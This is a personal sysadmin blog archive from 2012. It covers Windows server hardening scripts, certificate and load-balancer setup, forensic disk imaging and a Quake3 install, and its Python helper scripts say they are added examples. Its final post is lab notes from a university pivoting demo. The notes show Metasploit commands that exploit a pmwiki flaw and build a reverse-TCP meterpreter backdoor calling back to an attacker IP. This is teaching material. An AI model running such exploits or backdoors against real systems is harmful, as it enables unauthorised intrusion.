Friday, 19 October 2012

Windows 2008 R2 server hardening v3


In the first blog post you might have noticed that Start.PS1 calls .\4_Mine2.PS1. Today we will look at its content and what we are doing with that file.

One of the most important issues with any Windows system is keeping it up to date. Let's assume that you have a WSUS in your network... so you need to register this new box with that WSUS. Following the scripts from another lovely blogger (Athif), we put in our 0_Mine.PS1 file:

##**Enable Automatic Updates**
Write-Host ""
Write-Host "Configuring Automatic Updates through the WUPPS..." -ForegroundColor $Global:OnScreenMsgColor
net stop wuauserv
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v AccountDomainSid /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v PingID /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /f
net start wuauserv
wuauclt /resetauthorization /detectnow
reg import wupps-download-only.reg
Write-Host ""
Write-Host "Forcing Update through the WUPPS..." -ForegroundColor $Global:OnScreenMsgColor
net stop wuauserv
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v LastWaitTimeout /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v DetectionStartTime /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v NextDetectionTime /f
net start wuauserv
Write-Host "Update Configuration Completed..." -ForegroundColor $Global:OnScreenMsgColor
Write-Host ""


The wupps-download-only.reg file contains:
-----------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\windows\WindowsUpdate]
"WUServer"="http://wupps.localdomain.local"
"WUStatusServer"="http://wupps.localdomain.local"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\windows\WindowsUpdate\AU]
"AutoInstallMinorUpdates"=dword:00000001
"NoAutoRebootWithLoggedOnUsers"=dword:00000001
"NoAutoUpdate"=dword:00000000
"AUOptions"=dword:00000003
"ScheduledInstallDay"=dword:00000000
"ScheduledInstallTime"=dword:00000012
"UseWUServer"=dword:00000001

-----------------------------------------------------------
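To check that what lands in the registry is what the file intends, here is an added example (my code, not from the post or from Tao's scripts) that parses a REGEDIT5 export like wupps-download-only.reg and audits the WSUS/AU policy values; the copy of the file embedded below is constructed from the listing above, and AUOptions 3 is the "download only" mode the file name refers to.

```python
import re

# Constructed copy of the wupps-download-only.reg listing from the post.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\windows\WindowsUpdate]
"WUServer"="http://wupps.localdomain.local"
"WUStatusServer"="http://wupps.localdomain.local"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\windows\WindowsUpdate\AU]
"AutoInstallMinorUpdates"=dword:00000001
"NoAutoRebootWithLoggedOnUsers"=dword:00000001
"NoAutoUpdate"=dword:00000000
"AUOptions"=dword:00000003
"ScheduledInstallDay"=dword:00000000
"ScheduledInstallTime"=dword:00000012
"UseWUServer"=dword:00000001
'''

WU_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\windows\WindowsUpdate"
AU_KEY = WU_KEY + r"\AU"

# Meaning of the documented AUOptions values (3 is what the post's file sets).
AU_OPTIONS = {
    2: "notify before download",
    3: "auto download, notify before install",
    4: "auto download and schedule the install",
    5: "let the local admin choose",
}

_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def parse_reg(text):
    """Parse a REGEDIT5 export into {key_path: {value_name: value}}.

    REG_SZ ("...") becomes str, REG_DWORD (dword:hex) becomes int, the default
    value is stored under "@"; other encodings (hex:, hex(7): ...) stay raw."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m is None or current is None:
            raise ValueError("unparseable line: %r" % raw)
        name = "@" if m.group(1) is None else m.group(1)
        data = m.group(2)
        if data.startswith("dword:"):
            value = int(data[len("dword:"):], 16)
        elif len(data) >= 2 and data[0] == data[-1] == '"':
            value = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        else:
            value = data
        keys[current][name] = value
    return keys


def audit_wsus_policy(keys):
    """Return findings as strings; an empty list (ignoring "info:" entries) means
    the export does what the post intends: clients use the internal WSUS and
    auto-download updates. "info:" entries are advisory, not failures."""
    findings = []
    wu, au = keys.get(WU_KEY, {}), keys.get(AU_KEY, {})
    if au.get("UseWUServer") != 1:
        findings.append("UseWUServer != 1: clients would talk to Microsoft Update, not the WSUS")
    for name in ("WUServer", "WUStatusServer"):
        url = wu.get(name)
        if not isinstance(url, str) or not url.startswith(("http://", "https://")):
            findings.append("%s missing or not a URL" % name)
        elif url.startswith("http://"):
            findings.append("info: %s is plain http; serve WSUS over https where possible" % name)
    if au.get("NoAutoUpdate") != 0:
        findings.append("NoAutoUpdate != 0: automatic updates are switched off entirely")
    option = au.get("AUOptions")
    if option not in AU_OPTIONS:
        findings.append("AUOptions=%r is not a documented value" % (option,))
    elif option == 2:
        findings.append("AUOptions=2: nothing is downloaded until a user says so")
    if option == 4 and not 0 <= au.get("ScheduledInstallTime", -1) <= 23:
        findings.append("scheduled install selected but ScheduledInstallTime is not an hour 0-23")
    return findings


if __name__ == "__main__":
    parsed = parse_reg(SAMPLE_REG)
    au = parsed[AU_KEY]
    print("AUOptions=%s (%s), install hour %s" % (
        au["AUOptions"], AU_OPTIONS[au["AUOptions"]], au["ScheduledInstallTime"]))
    for finding in audit_wsus_policy(parsed) or ["no findings"]:
        print(" -", finding)
```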

Tao's script assumes you want to disable the default Windows firewall, most likely because you will install a third-party firewall or an anti-virus with that functionality afterwards. Well, let's say we are poor and we need that firewall to work!!

###**Firewall Configuration**
Write-Host "Configuring Firewall..." -ForegroundColor $Global:OnScreenMsgColor
Write-Host "Enabling RDP to this host..." -ForegroundColor $Global:OnScreenMsgColor
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
Write-Host "Allowing RDP access to our admin VLAN and another IP..." -ForegroundColor $Global:OnScreenMsgColor
netsh advfirewall firewall set rule name="remote desktop (TCP-In)" new remoteip="192.168.1.100,192.168.5.0/24" enable=yes
Write-Host "Disabling DFS Management to this host..." -ForegroundColor $Global:OnScreenMsgColor
netsh advfirewall firewall set rule group="dfs management" new enable=no
Write-Host "Enabling SNMP access to this host..." -ForegroundColor $Global:OnScreenMsgColor
netsh advfirewall firewall set rule group="SNMP Service" new enable=yes
netsh advfirewall firewall set rule group="SNMP Trap" new enable=yes
Write-Host "Firewall Configuration Complete..." -ForegroundColor $Global:OnScreenMsgColor


Lastly, that Server Manager pop-up and the notification-area auto-hide annoy me a bit, so...

## Disable Server Manager Login screen
Write-Host "Disabling Server Manager Pop-up..." -ForegroundColor $Global:OnScreenMsgColor
reg add HKCU\Software\Microsoft\ServerManager /v DoNotOpenServerManagerAtLogon /t REG_DWORD /d 1 /f

Write-Host "Show all icons on notification bar..." -ForegroundColor $Global:OnScreenMsgColor
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer /v EnableAutoTray /t REG_DWORD /d 0 /f

and all is well with the world again :)

NOTE! As Tao mentions in the readme.doc, "By default, Execution policy is “Restricted” which means powershell scripts are not allowed to run." When you fix that by running

Set-ExecutionPolicy Unrestricted

keep in mind that when you are done and have rebooted the system, you have to set it back:

Set-ExecutionPolicy Restricted


That's all for now, stay tuned..

Thursday, 18 October 2012

Microsoft Security Compliance Manager (Intro)

The product looked very interesting so I decided to give it a go.. (it's free, no objections!!)

Prerequisites:

- Windows 2008 R2 SP1 box
- Microsoft .NET Framework 4
- Security Compliance Manager

Play time:

Go ahead and install the above in the order mentioned. When you reach the SCM step it will need to install SQL Server Express as well, so go ahead and do that too.

When the install finishes, SCM will pop up and all the basic baselines will be imported (woohoo, we are on our way!)

As you can see there is a considerable amount of work that has been done here.. you have templates for pretty much all the supported versions of Windows (you must be crazy running anything outside of that matrix in your production environment!).

In addition to that, each version has been categorized according to server functions (roles, to use the MS language...) so it's very easy to select the one you want and Duplicate it (link on the column) so you can edit it further to your liking!

Moving on from the customization subject, which I will be coming back to later on: in the Start menu of the SCM you will see that LocalGPO is included. Go ahead and install it on the target systems so it can be used later on to deploy the custom Local Policy configs we will build.

When it's done you can open your PowerShell and go to Program Files (x86)\LocalGPO, where you can find LocalGPO.wsf (running it plainly gives you a pop-up menu with the instructions).

The main reason behind LocalGPO is that it's the only free way of distributing what we will do in SCM. The other ways all involve System Center, which is not for everybody :P


That's all for now.. will come back to that later on.

Windows 2008 R2 server hardening v2

Continuing on from the previous blog post, Tao's script is not just things that don't work.
Because it is coded so nicely you can edit SecPolicy.inf to do more things, for example:

Under [System Access] you can add

PasswordHistorySize = 13
PasswordComplexity = 1
MaximumPasswordAge = 42
MinimumPasswordAge = 2
MinimumPasswordLength = 8
ResetLockoutCount = 2880
LockoutBadCount = 2
LockoutDuration = -1


which will enable you to define Account Policies better
(more details at technet)

and under [Registry Values] add

MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCAD=4,0
MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management\ClearPageFileAtShutdown=4,1
MACHINE\Software\Microsoft\ServerManager\Oobe\DoNotOpenInitialConfigurationTasksAtLogon=4,1

which will force users to press CTRL+ALT+DEL to log on to the system, clear the PageFile (swap) at shutdown (usually that can be an audit requirement for some environments), and finally get rid of the Initial Configuration screen.
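As an added example (my code, not Tao's), a parser for the two template sections used above plus checks on the account-policy values, including the two ordering rules Windows applies (minimum password age below the maximum, lockout reset window no longer than the lockout duration); the template text below is constructed from the post's entries.

```python
# Constructed SecPolicy.inf fragment carrying the additions listed in the post.
SAMPLE_INF = r"""[Unicode]
Unicode=yes
[System Access]
PasswordHistorySize = 13
PasswordComplexity = 1
MaximumPasswordAge = 42
MinimumPasswordAge = 2
MinimumPasswordLength = 8
ResetLockoutCount = 2880
LockoutBadCount = 2
LockoutDuration = -1
[Registry Values]
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCAD=4,0
MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management\ClearPageFileAtShutdown=4,1
MACHINE\Software\Microsoft\ServerManager\Oobe\DoNotOpenInitialConfigurationTasksAtLogon=4,1
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Type codes secedit uses in [Registry Values] entries of the form value=type,data.
REG_TYPES = {1: "REG_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}

DISABLE_CAD = r"MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCAD"


def parse_secedit_inf(text):
    """Return {section: {name: value}}. [System Access] numbers become ints and
    [Registry Values] entries become (type_name, data); everything else stays str."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            raise ValueError("unexpected line: %r" % raw)
        name, _, value = line.partition("=")
        name, value = name.strip(), value.strip()
        if current == "System Access" and value.lstrip("-").isdigit():
            value = int(value)
        elif current == "Registry Values":
            type_id, _, data = value.partition(",")
            type_name = REG_TYPES.get(int(type_id), "type %s" % type_id)
            value = (type_name, int(data) if type_name == "REG_DWORD" else data)
        sections[current][name] = value
    return sections


def audit_account_policy(system_access):
    """Findings against the [System Access] values: the thresholds the post picks
    plus the ordering rules Windows applies to these settings."""
    sa, findings = system_access, []
    if sa.get("PasswordComplexity") != 1:
        findings.append("PasswordComplexity is not 1")
    if sa.get("MinimumPasswordLength", 0) < 8:
        findings.append("MinimumPasswordLength below 8")
    if sa.get("PasswordHistorySize", 0) < 1:
        findings.append("no password history, old passwords can be reused immediately")
    max_age, min_age = sa.get("MaximumPasswordAge", 0), sa.get("MinimumPasswordAge", 0)
    if max_age != -1 and not 0 <= min_age < max_age:   # -1 means passwords never expire
        findings.append("MinimumPasswordAge must be below MaximumPasswordAge")
    if sa.get("LockoutBadCount", 0) == 0:
        findings.append("LockoutBadCount is 0, account lockout is disabled")
    duration, reset = sa.get("LockoutDuration", 0), sa.get("ResetLockoutCount", 0)
    if duration != -1 and reset > duration:             # -1 means locked until an admin unlocks
        findings.append("ResetLockoutCount exceeds LockoutDuration")
    return findings


def ctrl_alt_del_required(sections):
    """True when DisableCAD is a REG_DWORD 0, i.e. CTRL+ALT+DEL is enforced at logon."""
    return sections.get("Registry Values", {}).get(DISABLE_CAD) == ("REG_DWORD", 0)


if __name__ == "__main__":
    parsed = parse_secedit_inf(SAMPLE_INF)
    print("CTRL+ALT+DEL required:", ctrl_alt_del_required(parsed))
    print("findings:", audit_account_policy(parsed["System Access"]) or "none")
```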

Because the script renames the system and makes all those other changes, if we need to install SNMP/WMI we need to do it early, so 0_Mine.PS1 comes in handy once again.

Add to 0_Mine.PS1 (replacing the <> entries, of course):

## Install SNMP
Write-Host "Installing and configuring SNMP..." -ForegroundColor $Global:OnScreenMsgColor
dism /online /enable-feature:SNMP
dism /online /enable-feature:WMISnmpProvider
reg add "HKLM\SYSTEM\CurrentControlSet\services\SNMP\Parameters\ValidCommunities" /v <RO_COMMUNITY_NAME> /t REG_DWORD /d 4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\services\SNMP\Parameters\PermittedManagers" /v 2 /t REG_SZ /d <IP_OF_UR_NAGIOS_BOX> /f
reg add "HKLM\SYSTEM\CurrentControlSet\services\SNMP\Parameters\RFC1156Agent" /v sysServices /t REG_DWORD /d 79 /f


That's all for now.. more to come :)

Windows 2008 R2 server hardening v1


Time to stop thinking about Linux hardening (at least for a while) and take a quick look at Windows 2008 R2.. One would be crazy to have an infrastructure with just Windows OR just Linux, so both need to be brought up to an acceptable level (out of the box never works, I am not going to debate that).

The following I found to be quite useful resources:

Link 1
Link 2 (pdf)
Link 3 (MS technet)
Link 4 (blog)
Link 5 (blog)

The last link (Tao Yang) is a brilliant collection of PowerShell scripts which do many wonderful things.

Unfortunately nothing works out of the box so...

You can create a 0_Mine.PS1 which you include in Start.PS1 (around line 230) before Tao's own scripts start.

Add this to 0_Mine.PS1:

Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\iphlpsvc -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\Dhcp -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\Spooler -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\RemoteRegistry -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\WinRM -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\UxSms -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\LanmanServer -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\LanmanWorkstation -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\lmhosts -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\CertPropSvc -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\SCPolicySvc -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\ScardSvr -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\RasMan -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\Tapisrv -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\RasAuto -Name "Start" -Value 4
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\services\RemoteAccess -Name "Start" -Value 4


Another thing that did not work was the IPv6 disabling bit... so Bhargav Shukla (ex-Microsoft dude) to the rescue..

technet bshukla

You can pick that up and add it to the same area in Start.PS1 but make sure it looks like this:

.\0_Mine.PS1
.\1_OSConfig.PS1
.\2_network.PS1
.\Disable-IPv6Components.ps1 -All
.\3_security.PS1
.\4_Mine2.PS1



more to come.. stay tuned (I am far from saying done on this one!)
 

Thursday, 6 September 2012

NetIQ Access Manager Admin Console custom certificates

When you have any type of web service offered via https the first thing that should cross your mind should be "did I install verified certificates for this?". I will not go into the many reasons why you should do this... just do it!

NetIQ are continuing the work after Novell on Access Manager so even if they have awesome documentation for 99% of the product... they missed that (thank the gods they had some useful hints for this though in the support for iManager [link in the end])

So here it is:

  • cd /etc/opt/novell/tomcat7/ ; mkdir certs ; cd certs
  • /opt/novell/java/bin/keytool -genkey -keysize 2048 -alias <hostname.domain.com> -keyalg RSA -keystore <hostname>.keystore
  • /opt/novell/java/bin/keytool -certreq -keyalg RSA -alias <hostname.domain.com> -file certreq.csr -keystore <hostname>.keystore
  • Send the csr to your Certification Authority (in this case COMODO)
  • Make sure that everything is where it should be
    /opt/novell/java/bin/keytool -list -keystore /etc/opt/novell/tomcat7/certs/<hostname>.keystore -v
  • Get whatever.zip from comodo
  • cd /etc/opt/novell/tomcat7/certs/ ; unzip /root/whatever.zip
  • chown novlwww.novlwww *
  • /opt/novell/java/bin/keytool -import -alias root -keystore <hostname>.keystore -trustcacerts -file TERENASSLCA.crt
  • /opt/novell/java/bin/keytool -import -alias caroot -keystore <hostname>.keystore -trustcacerts -file UTNAddTrustServer_CA.crt
  • /opt/novell/java/bin/keytool -import -alias <hostname.domain.com> -keystore <hostname>.keystore -trustcacerts -file whatever.crt
  • /opt/novell/java/bin/keytool -import -alias tomcat -keystore <hostname>.keystore -trustcacerts -file whatever.crt
  • Double check that all certs are in the keystore
    /opt/novell/java/bin/keytool -list -keystore /etc/opt/novell/tomcat7/certs/<hostname>.keystore -v 
You would think at this point that following the normal Tomcat process would be good enough and we could just add in our server.xml at the 8443 connector an option like keystoreFile="/etc/opt/novell/tomcat7/certs/<hostname>.keystore" and that would be it... but NO. I tried it and it did NOT work for some reason... so here is the fix:

  • cp -p /var/opt/novell/novlwww/.keystore /var/opt/novell/novlwww/.keystore-default
  • mv /etc/opt/novell/tomcat7/certs/<hostname>.keystore /var/opt/novell/novlwww/.keystore
  • service novell-ac restart
  • And done!
more here: Replacing default certificates in iManager 2.7 (non-OES install)
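For the "double check that all certs are in the keystore" step, here is an added example (mine, not NetIQ's or the post's) that parses `keytool -list -v` output and checks that the server alias is a PrivateKeyEntry whose chain is linked certificate by certificate and ends at a root that is self-signed or present as a trusted entry; the listing below is constructed, with the alias names from the post and invented hostnames and DNs.

```python
# Constructed excerpt of `keytool -list -v` output for a keystore built the way the
# post describes (aliases from the post; hostname and DNs invented).
SAMPLE_LISTING = """Keystore type: JKS
Keystore provider: SUN

Your keystore contains 3 entries

Alias name: nam.example.com
Creation date: Sep 6, 2012
Entry type: PrivateKeyEntry
Certificate chain length: 3
Certificate[1]:
Owner: CN=nam.example.com, O=Example University, C=GB
Issuer: CN=Example SSL CA, O=Example CA, C=NL
Certificate[2]:
Owner: CN=Example SSL CA, O=Example CA, C=NL
Issuer: CN=Example Root CA, O=Example CA, C=US
Certificate[3]:
Owner: CN=Example Root CA, O=Example CA, C=US
Issuer: CN=Example Root CA, O=Example CA, C=US

*******************************************

Alias name: root
Entry type: trustedCertEntry
Owner: CN=Example SSL CA, O=Example CA, C=NL
Issuer: CN=Example Root CA, O=Example CA, C=US

*******************************************

Alias name: caroot
Entry type: trustedCertEntry
Owner: CN=Example Root CA, O=Example CA, C=US
Issuer: CN=Example Root CA, O=Example CA, C=US
"""


def parse_keytool_listing(text):
    """Return {alias: {"type": entry_type, "certs": [(owner, issuer), ...]}} from
    `keytool -list -v` output; certificates are kept in the order keytool prints them,
    which for a PrivateKeyEntry is chain order (leaf first)."""
    entries, alias = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Alias name:"):
            alias = line.split(":", 1)[1].strip()
            entries[alias] = {"type": None, "certs": []}
        elif alias is None:
            continue
        elif line.startswith("Entry type:"):
            entries[alias]["type"] = line.split(":", 1)[1].strip()
        elif line.startswith("Owner:"):
            entries[alias]["certs"].append([line.split(":", 1)[1].strip(), None])
        elif line.startswith("Issuer:"):
            entries[alias]["certs"][-1][1] = line.split(":", 1)[1].strip()
    for entry in entries.values():
        entry["certs"] = [tuple(c) for c in entry["certs"]]
    return entries


def chain_problems(entries, alias):
    """Reasons Tomcat could not serve `alias` with a complete chain: no private key
    under that alias, a gap between one certificate's issuer and the next one's
    subject, or a chain ending at a CA that is neither self-signed nor trusted."""
    entry = entries.get(alias)
    if entry is None or entry["type"] != "PrivateKeyEntry":
        return ["%s is not a PrivateKeyEntry (the server needs the key, not just the cert)" % alias]
    problems, certs = [], entry["certs"]
    for (owner, issuer), (next_owner, _) in zip(certs, certs[1:]):
        if issuer != next_owner:
            problems.append("gap: %s is issued by %s but next in chain is %s" % (owner, issuer, next_owner))
    last_owner, last_issuer = certs[-1]
    trusted = {c[0] for e in entries.values() if e["type"] == "trustedCertEntry" for c in e["certs"]}
    if last_owner != last_issuer and last_issuer not in trusted:
        problems.append("chain ends at %s, which is neither self-signed nor a trusted entry" % last_issuer)
    return problems


if __name__ == "__main__":
    parsed = parse_keytool_listing(SAMPLE_LISTING)
    print("nam.example.com:", chain_problems(parsed, "nam.example.com") or "chain complete")
    print("tomcat:", chain_problems(parsed, "tomcat"))
```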


Wednesday, 5 September 2012

CISSP Training

CISSP Training was completed a bit over a week ago and revision is continuing still...

The course was delivered by Geraint Williams of IT Governance through the University's KnowledgeHub program (enough with the ads though!!).

Awesome course to say the least, plus GeraintW was kind enough to add some very nice posts to his blog detailing some of the material covered in the course (brilliant for revision)

And here we go:

Domain 1 - Access Control
Domain 2 - Telecommunications and Network Security
Domain 3 - Information Governance & Risk Management
Domain 4 - Software Development Security
Domain 5 - Cryptography
Domain 6 - System Architecture and Design
Domain 7 - Operations Security
Domain 8 - Business Continuity & Disaster Recovery
Domain 9 - Legal, Regulations & Investigations

One more to come I will add them when they are done I guess :)

Many thanks need to go to GeraintW for providing us with a great course :)

Cheers!


F5 BigIP - NetIQ Access Manager monitors

Vacations have ended and it's back to work...

Let's create some monitors for the master proxies of the Access Manager we have set up, so we don't leave it to the default icmp_gateway health check.

Assumptions:


  • You have configured your Admin consoles, Identity servers, Access Gateways 
  • You have added one http and one https reverse proxy in the Gateways (so the parent proxies exist at least..)
  • You have created two vIPs on the F5s pointing to each Pool of the IPs of each proxy

Monitors:

  • Go to your F5 Admin GUI login and go to Local Traffic -> Monitors -> Create
  • Name: Access_Gateway_HTTPS_Monitor 
  • Select type: HTTPS
  • Leave defaults for all fields except 
  • Send String should be:   GET /nesp/app/heartbeat HTTP/1.1\r\nHost: <hostname-of-your-https-proxy-parent>\r\nConnection: Keepalive\r\n\r\n
  • Receive String should be:  Success
  • Click Finished
  • Go to the http pool and add it as a Monitor
  • Follow same steps for http only changing the type and the hostname of the parent proxy


Done :)
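The exchange the monitor performs, as an added example (my code, not the post's F5 or NetIQ configuration): the F5 send string above is sent from Python and the reply is judged the way the monitor judges it, against a constructed local stand-in for the Access Gateway that answers the heartbeat only when the Host header names the parent proxy; ag.example.com is an invented parent-proxy hostname.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# The send/receive strings exactly as configured on the F5 in the post
# (the HTTPS monitor sends the same bytes inside TLS).
SEND_STRING = ("GET /nesp/app/heartbeat HTTP/1.1\r\n"
               "Host: {parent}\r\n"
               "Connection: Keepalive\r\n\r\n")
RECEIVE_STRING = b"Success"


def probe(host, port, parent_proxy_host, timeout=3.0):
    """Do what the F5 HTTP monitor does: send the request, read until the receive
    string shows up (or the peer closes / the timeout hits) and report up/down."""
    request = SEND_STRING.format(parent=parent_proxy_host).encode()
    reply = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            while RECEIVE_STRING not in reply and len(reply) < 65536:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                reply += chunk
    except socket.timeout:
        pass                       # judge on whatever arrived before the timeout
    except OSError:
        return False               # refused / unreachable: member is down
    return RECEIVE_STRING in reply


class HeartbeatStub(BaseHTTPRequestHandler):
    """Constructed stand-in for the Access Gateway: answers the heartbeat URL with
    "Success" only when the Host header names the parent proxy (the gateway
    dispatches by Host); other Hosts or paths get a 404, an unhealthy gateway a 503."""
    parent_host = "ag.example.com"
    healthy = True

    def do_GET(self):
        if self.headers.get("Host") != self.parent_host or self.path != "/nesp/app/heartbeat":
            status, body = 404, b"Not Found"
        elif not self.healthy:
            status, body = 503, b"Failure"
        else:
            status, body = 200, b"Success"
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the stub quiet
        pass


def start_stub(healthy=True):
    """Serve the stub on an ephemeral localhost port in a daemon thread; returns (server, port)."""
    HeartbeatStub.healthy = healthy
    server = HTTPServer(("127.0.0.1", 0), HeartbeatStub)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    server, port = start_stub()
    print("right Host header:", "UP" if probe("127.0.0.1", port, "ag.example.com") else "DOWN")
    print("wrong Host header:", "UP" if probe("127.0.0.1", port, "other.example.com") else "DOWN")
    server.shutdown()
```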

Thursday, 14 June 2012

Quake3 Arena Fedora 16

Yes, it's that time of the year that I get bored and all I want to do is play some Quake3 :)

So yeah... quick post and back to gaming :)

  • Download both packages from:
    http://ioquake3.org/
  • chmod +x both files
  • run them
  • ln -s /whereever_u_keep_ur_pak0.pk3_file/pak0.pk3 /usr/local/games/ioquake3/baseq3/
  • and run ioquake3
  • hit ~ and enter
  • /r_mode -1
  • /r_customwidth 1680
  • /r_customheight 1050
  • /vid_restart
  • and when you get in the game...
  • /cg_fov 120

Go Yuriko!!

Monday, 21 May 2012

Restore files / Image acquisition 101

First of all, let's acquire the image of the disk in question so we can recover the files.

Boot your BackTrack disc (USB or disc does not matter that much) and load up the Forensics mode (it mounts no disk and uses no swap).

Check to see what disks/partitions we've got:

dmesg | grep sd

Get the images from both partitions and transfer them to the workstation where you will be doing the work.

dcfldd if=/dev/sda1 | ssh username@hostname "dd of=/path/on/the/remote/machine/image1.img" 

dcfldd if=/dev/sda2 | ssh username@hostname "dd of=/path/on/the/remote/machine/image2.img"

Now let's convert the images to VMware disks:

qemu-img convert -f raw /storage/data/recover/sda1.img -O vmdk /storage/data/recover/vmware-sda1.vmdk

or

wget "http://downloads.sourceforge.net/project/raw2vmdk/raw2vmdk-0.1.3.1-jar.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fraw2vmdk%2F&ts=1337595038&use_mirror=kent"

tar -zxvf raw2vmdk-0.1.3.1-jar.tar.gz
rm -rf raw2vmdk-0.1.3.1-jar.tar.gz
cd  raw2vmdk-0.1.3.1-jar

java -jar raw2vmdk.jar /storage/data/recover/sda2.img /storage/data/recover/vmware-sda2.vmdk
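Before converting, it is worth confirming that the image that arrived over ssh matches the source. Added example (mine, not from the post): windowed hashing in the style of dcfldd's hash=/hashwindow= options, run on both sides and compared to locate the first damaged window; the 3-window image in the demo is constructed.

```python
import hashlib
import io


def window_hashes(stream, window=1024 * 1024, algo="sha256"):
    """Hash a raw image the way dcfldd's hash=/hashwindow= options do: one digest
    per `window` bytes plus a digest of the whole image. Returns (total_hex, [hex, ...])."""
    total, windows = hashlib.new(algo), []
    while True:
        block = stream.read(window)
        if not block:
            break
        total.update(block)
        windows.append(hashlib.new(algo, block).hexdigest())
    return total.hexdigest(), windows


def first_bad_window(src_hashes, copy_hashes):
    """Index of the first window whose digest differs (or whose counterpart is
    missing), or None when source and copy agree window for window."""
    for i, (a, b) in enumerate(zip(src_hashes, copy_hashes)):
        if a != b:
            return i
    if len(src_hashes) == len(copy_hashes):
        return None
    return min(len(src_hashes), len(copy_hashes))


def verify_copy(src_path, copy_path, window=1024 * 1024):
    """Compare two on-disk images; returns (identical, first_bad_window_or_None)."""
    with open(src_path, "rb") as src, open(copy_path, "rb") as copy:
        src_total, src_w = window_hashes(src, window)
        copy_total, copy_w = window_hashes(copy, window)
    return src_total == copy_total, first_bad_window(src_w, copy_w)


def demo(window=4096):
    """Constructed 3-window image and a copy with one byte flipped inside window 1."""
    image = bytes(range(256)) * 48                 # 12288 bytes = 3 windows of 4096
    damaged = bytearray(image)
    damaged[window + 123] ^= 0xFF
    src_total, src_w = window_hashes(io.BytesIO(image), window)
    bad_total, bad_w = window_hashes(io.BytesIO(bytes(damaged)), window)
    return src_total == bad_total, first_bad_window(src_w, bad_w)


if __name__ == "__main__":
    print(demo())  # (False, 1)
```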


Now they can be loaded into VMware and files can be restored using:

Diskdigger (needs licence)
Recuva (free)
FreeRecovereer (free)
File Scavenger (needs licence)


Stay tuned :)

Tuesday, 15 May 2012

UoB pivoting demo

These are the notes from a quick demo I did at the University of Bedfordshire. Enjoy..

  • Open Armitage
  • Scan (nmap) 172.16.128.x and find web server
db_nmap -sT -Pn -T5 -O --open 172.16.128.1/24 
  • Find attacks
  • Visit site (http://172.16.128.3) and attack
  • Exploit using CVE-2011-4453  (pmwiki) GUI fail -> use console
use exploit/multi/http/pmwiki_pagelist
set rhost 172.16.128.3
exploit -j
sessions -v
  • Check out the system (sysinfo,ps,getuid) no hashdump/winenum/route >> php-meterpreter not full functionality so...
  • Create a backdoor
msfpayload windows/x64/meterpreter/reverse_tcp LHOST=172.16.128.10 LPORT=8443 EXITFUNC=thread X > /root/Tools/runme.exe
